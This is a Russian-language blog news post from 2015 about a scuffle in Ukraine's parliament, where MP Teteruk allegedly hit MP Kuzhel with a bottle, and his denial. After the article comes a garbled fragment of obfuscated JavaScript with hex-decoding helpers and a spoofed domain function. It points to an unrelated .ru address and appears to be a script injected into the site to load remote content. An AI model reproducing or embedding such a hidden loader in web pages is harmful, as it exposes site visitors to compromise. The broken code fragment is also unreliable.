ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

Бутылкой по голове. Нардеп Тетерук: Кужель сама налетела на бутылку… Подробности скандала

Posted by operkor на Ноябрь 6, 2015

1Заместитель руководителя фракции «Народный фронт» Андрей Тетерук после пленарного заседания в четверг, 5 ноября, нанес телесные повреждения народному депутату от фракции «Батькивщина» Александре Кужель. Об этом сообщает пресс-служба «Батькивщины».

«Позорный инцидент произошел после завершения пленарного заседания прямо возле приемной председателя Верховной Рады в присутствии других народных депутатов. По словам свидетеля, народного депутата Сергея Власенко, Тетерук позволил себе оскорбительные высказывания в адрес членов фракции «Батькивщина», лично грубо обидел Кужель и ударил ее по голове стеклянной бутылкой», — заявили в пресс-службе политсилы.

В то же время издание УНН сообщает, что к зданию Верховной Рады Украины подъехали три машины скорой помощи и начали подтягивать милицию. «Вечер перестает быть томным. В Раде сейчас три скорые, две машины документирования и много ментов», — отметила пресс-секретарь лидера фракции БПП Юрия Луценко Лариса Сарган.

Народный депутат Андрей Тетерук ударил стеклянной бутылкой по голове Александру Кужель в здании Верховной Рады. Об этом в эфире телеканала «112 Украина» заявил народный депутат Сергей Евтушок.

1-3«После пленарного заседания несколько народных депутатов партии «Батькивщина» пошли в кабинет председателя ВР, чтобы выяснить, почему не были поставлены и не рассмотрены законопроекты, которые не касаются ренты снижения процентов, а также не рассмотрели вопрос на продление моратория.

В этом же кабинете, после консультаций, мы встретились там с представителями «Народного фронта», был Максим Бурбак, Андрей Тетерук и, когда мы говорили со спикером ВР, они, особенно Тетерук, пытался вклиниться в разговор, на что мы ему делали замечания, в частности Александра Кужель.

Когда мы вышли, когда закончились консультации с председателем Гройсманом, мы вышли в фойе, где состоялся очень неприятный инцидент. Я стоял рядом, у Тетерука я увидел стеклянную бутылку с водой, которой он ударил народного депутата Александру Кужель», — сказал Евтушок.

Он отметил, что «Батькивщина» будет требовать того, чтобы «такие нардепы не были в стенах парламента».

«Мы сразу вызвали скорую, измерили давление. У Александры Владимировны было очень высокое давление, около 170 на 100, это для нее очень высокое давление. Вызвали врачей, ей оказали помощь. Ей плохо, сейчас она госпитализирована».

В «Батькивщине» заявили, что врачи диагностировали у Кужель сотрясение мозга. «Александра Кужель чувствует себя очень плохо — врачи скорой помощи диагностировали сотрясение мозга», — говорится в сообщении.

1-2Нардеп Тетерук заявляет, что не бил коллегу

Народный депутат от Народного Фронта Андрей Тетерук заявил, что во время конфликта 5 ноября в Раде нардеп от Батькивщины Александра Кужель сама дотронулась до бутылки головой. Об этом парламентарий заявил в кулуарах Рады 6 ноября.

«Я пытался избежать ударов, какие мне наносила госпожа Кужель сумкой … Я отходил назад и пришел к стенке, не мог уже дальше идти. Во время удара (Кужель — ред.) У меня действительно была бутылка с водой», — рассказал он детали драки.

«Я не бил ее, я отходил назад. Во время удара сумкой она дотронулась головой до бутылки. Я не бил. Никаких действий агрессивных с моей стороны не было. Синяков, сотрясения мозга, рассечение, ничего такого нет. Она (Кужель — ред.) не теряла сознание», — сообщил журналистам депутат.  Тетерук заявил, что он сожалеет об инциденте, и пожелал коллеге скорейшего возвращения из больницы.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e//cs8gc1senu.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: